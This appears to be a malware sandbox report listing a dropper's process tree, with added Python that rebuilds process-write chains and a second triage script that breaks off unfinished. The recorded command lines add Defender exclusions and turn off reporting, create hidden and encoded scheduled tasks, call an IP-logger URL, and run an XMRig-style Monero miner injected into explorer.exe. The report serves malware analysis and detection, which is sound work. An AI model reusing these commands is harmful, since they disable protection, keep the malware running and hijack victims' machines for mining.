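Every write in the table above goes from a parent into the child it has just started, which is routine: CreateProcess copies the new process's parameters into it with a cross-process write, so a dropper that spawns cmd.exe lights this signature up without injecting anything. The rows that deserve attention are writes into a process the writer did not create. The following Python is a worked example added here, not part of the sandbox report: it parses rows in the report's flattened format, collapses the repeated entries, rebuilds the writer chain for a PID, and flags PIDs written to by more than one process. SAMPLE_ROWS is copied from the table; CONSTRUCTED_INJECTION_ROWS is made up to show the shape of a cross-process write and describes nothing this sample did.

```python
"""Rebuild writer chains from a flattened "Suspicious use of WriteProcessMemory" table.

Added example; not part of the sandbox report. SAMPLE_ROWS is copied from the
table above (the report repeats each write several times). CONSTRUCTED_INJECTION_ROWS
is made up to show the shape of a cross-process write and does not describe this sample.
"""
import re
from collections import defaultdict

# One flattened row: "PID <writer> wrote to memory of <target> <writer> <writer image> <target image>"
ROW = re.compile(
    r"PID (?P<writer>\d+) wrote to memory of (?P<target>\d+) (?P=writer) "
    r"(?P<writer_img>\S+) (?P<target_img>\S+)"
)

SAMPLE_ROWS = """
PID 4956 wrote to memory of 4988 4956 setup_x86_x64_install.exe setup_installer.exe
PID 4956 wrote to memory of 4988 4956 setup_x86_x64_install.exe setup_installer.exe
PID 4956 wrote to memory of 4988 4956 setup_x86_x64_install.exe setup_installer.exe
PID 4988 wrote to memory of 5088 4988 setup_installer.exe setup_install.exe
PID 5088 wrote to memory of 4024 5088 setup_install.exe cmd.exe
PID 5088 wrote to memory of 3596 5088 setup_install.exe cmd.exe
PID 4024 wrote to memory of 3024 4024 cmd.exe powershell.exe
PID 3596 wrote to memory of 4108 3596 cmd.exe Sat20873bc74eb80e0.exe
"""

# Constructed rows (not from this report): two unrelated processes write into pid 9002.
CONSTRUCTED_INJECTION_ROWS = """
PID 9001 wrote to memory of 9002 9001 dropper.exe host.exe
PID 9003 wrote to memory of 9002 9003 injector.exe host.exe
"""


def parse_rows(text):
    """Return {(writer_pid, target_pid): (writer_image, target_image)}, duplicates collapsed."""
    edges = {}
    for m in ROW.finditer(text):
        edges[(int(m["writer"]), int(m["target"]))] = (m["writer_img"], m["target_img"])
    return edges


def writers_of(edges):
    """Map each written-into pid to the set of pids that wrote into it."""
    writers = defaultdict(set)
    for writer, target in edges:
        writers[target].add(writer)
    return writers


def image_of(edges, pid):
    """Image name for a pid, taken from the first edge that mentions it."""
    for (writer, target), (writer_img, target_img) in edges.items():
        if writer == pid:
            return writer_img
        if target == pid:
            return target_img
    return "?"


def chain(edges, pid):
    """Walk from pid up through single writers to the root; returns [(pid, image), ...] root first.
    Stops where a pid has several writers, because that is no longer a parent/child chain."""
    writers = writers_of(edges)
    path, seen = [pid], {pid}
    while True:
        ws = writers.get(path[-1])
        if not ws or len(ws) != 1:
            break
        (w,) = tuple(ws)
        if w in seen:  # defensive: malformed data could otherwise loop forever
            break
        seen.add(w)
        path.append(w)
    path.reverse()
    return [(p, image_of(edges, p)) for p in path]


def multi_writer_targets(edges):
    """Pids written by more than one process. A parent writing into the child it just created
    is routine (CreateProcess copies the process parameters that way); a second writer is not."""
    return sorted(t for t, ws in writers_of(edges).items() if len(ws) > 1)
```

On this report's rows chain(edges, 3024) yields setup_x86_x64_install.exe, setup_installer.exe, setup_install.exe, cmd.exe, powershell.exe, which matches the process tree below, and multi_writer_targets returns nothing; only the constructed rows produce a flagged PID.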
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC7375180\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20ecdfe3ee79f.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20ecdfe3ee79f.exeSat20ecdfe3ee79f.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\8airpAP2vSR1mNtVUpIMLusz.exe"C:\Users\Admin\Documents\8airpAP2vSR1mNtVUpIMLusz.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9k747JMG7jwW9QQSPMvI1cd9.exe"C:\Users\Admin\Documents\9k747JMG7jwW9QQSPMvI1cd9.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\qMwqayby3LtBSXcMFZn4WENT.exe"C:\Users\Admin\Documents\qMwqayby3LtBSXcMFZn4WENT.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\GM2TDOTFhN_nbC2OoeD2Rg86.exe"C:\Users\Admin\Documents\GM2TDOTFhN_nbC2OoeD2Rg86.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\Documents\U8WnVwnNyb2imZ4b_Nih_oJ5.exe"C:\Users\Admin\Documents\U8WnVwnNyb2imZ4b_Nih_oJ5.exe"9⤵
-
C:\Users\Admin\Documents\7HbN9T1cRnpv4wXKr0ap_CS7.exe"C:\Users\Admin\Documents\7HbN9T1cRnpv4wXKr0ap_CS7.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS31BB.tmp\Install.exe.\Install.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS32F3.tmp\Install.exe.\Install.exe /S /site_id "668658"11⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &12⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&13⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3214⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6414⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&13⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3214⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6414⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBcpYIDWL" /SC once /ST 08:56:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="12⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBcpYIDWL"12⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBcpYIDWL"12⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 21:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\wjichPy.exe\" W8 /site_id 668658 /S" /V1 /F12⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\cyhXA10eOOPKGx2fm1TIDtyP.exe"C:\Users\Admin\Documents\cyhXA10eOOPKGx2fm1TIDtyP.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\Yry2f6UscYEHvhxNM_NasvjF.exe"C:\Users\Admin\Documents\Yry2f6UscYEHvhxNM_NasvjF.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 9008⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\wOurEP1Lg22ZZexSGLrzgNTx.exe"C:\Users\Admin\Documents\wOurEP1Lg22ZZexSGLrzgNTx.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 6608⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 10928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 12368⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "wOurEP1Lg22ZZexSGLrzgNTx.exe" /f & erase "C:\Users\Admin\Documents\wOurEP1Lg22ZZexSGLrzgNTx.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "wOurEP1Lg22ZZexSGLrzgNTx.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\3AQleALHNNRtcBTszRyp7hDK.exe"C:\Users\Admin\Documents\3AQleALHNNRtcBTszRyp7hDK.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\QXHofo5pEteva5oWRgeBqUVV.exe"C:\Users\Admin\Documents\QXHofo5pEteva5oWRgeBqUVV.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"8⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Documents\hJfXrqQQ_Fe0h5fLGBSbNOgz.exe"C:\Users\Admin\Documents\hJfXrqQQ_Fe0h5fLGBSbNOgz.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"8⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\pDOVOMsZF5WLWhICeZK_Vlir.exe"C:\Users\Admin\Documents\pDOVOMsZF5WLWhICeZK_Vlir.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\OPlg5C44foFtCP1xTsMRcx2L.exe"C:\Users\Admin\Documents\OPlg5C44foFtCP1xTsMRcx2L.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\PPlD8Z0K7d9WUvvAWu1vun4D.exe"C:\Users\Admin\Documents\PPlD8Z0K7d9WUvvAWu1vun4D.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exe"C:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exeC:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exe8⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\hKGOBqPQ2CtFcQ7L_yVukhul.exe"C:\Users\Admin\Documents\hKGOBqPQ2CtFcQ7L_yVukhul.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\bRJ06_QbRE9hlrR0l4Zuq2_k.exe"C:\Users\Admin\Documents\bRJ06_QbRE9hlrR0l4Zuq2_k.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\237843444.exe"C:\Users\Admin\AppData\Local\237843444.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"7⤵
-
C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\elADi5yzsqicpvJG5uTkV55y.exe"C:\Users\Admin\Documents\elADi5yzsqicpvJG5uTkV55y.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\I3gaVL3bm1lMtsvde3S141IC.exe"C:\Users\Admin\Documents\I3gaVL3bm1lMtsvde3S141IC.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\xooCDT5mFHxEUzre1uE3Dd61.exe"C:\Users\Admin\Documents\xooCDT5mFHxEUzre1uE3Dd61.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7038799.scr"C:\Users\Admin\AppData\Roaming\7038799.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\7963793.scr"C:\Users\Admin\AppData\Roaming\7963793.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7048378.scr"C:\Users\Admin\AppData\Roaming\7048378.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat20578e6239.exe
    - Suspicious use of WriteProcessMemory

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20578e6239.exe
    Sat20578e6239.exe
    - Executes dropped EXE

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat2071d99516dc03841.exe
    - Suspicious use of WriteProcessMemory

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2071d99516dc03841.exe
    Sat2071d99516dc03841.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exe"
    - Executes dropped EXE

[depth 8] C:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exe
    C:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exe
    - Executes dropped EXE

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat20fbae42a4.exe
    - Suspicious use of WriteProcessMemory

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20fbae42a4.exe
    Sat20fbae42a4.exe
    - Executes dropped EXE

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat20873bc74eb80e0.exe
    - Suspicious use of WriteProcessMemory

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20873bc74eb80e0.exe
    Sat20873bc74eb80e0.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe

[depth 8] C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    - Kills process with taskkill

[depth 5] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sat205eb4a2ece877a.exe

[depth 6] C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat205eb4a2ece877a.exe
    Sat205eb4a2ece877a.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[depth 7] C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
    - Executes dropped EXE

[depth 8] C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

[depth 9] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

[depth 10] C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
    - Creates scheduled task(s)

[depth 9] C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[depth 10] C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

[depth 11] C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
    - Creates scheduled task(s)

[depth 10] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

[depth 10] C:\Windows\explorer.exe
    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
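The explorer.exe entry at depth 10 above is running with XMRig-style switches: RandomX (--algo=rx/0), a nanopool endpoint over TLS, a wallet in --user, and --cinit-* options that are not stock XMRig flags but come from whatever launcher wrapped the miner. explorer.exe does not mine on its own, so those arguments only make sense if miner code was placed into that process, which is consistent with the SetThreadContext signature on its parent services64.exe; the two schtasks lines give that parent an at-logon task with the highest run level. The Python below is an added example, not code from the sandbox report: it parses both command lines into structured indicators. The sample input is copied from the entries above; the Monero address test is a format check only, and splitting --user at the first dot into wallet and worker is an assumption about the pool's naming convention.

```python
"""Triage of the scheduled-task and miner command lines from the subtree above.
Added example; the sample lines are copied from the report as constructed input."""
import re

# A token is a run of non-space characters; "..." segments (with \" escapes) may embed spaces.
TOKEN = re.compile(r'(?:[^\s"]+|"(?:\\.|[^"\\])*")+')
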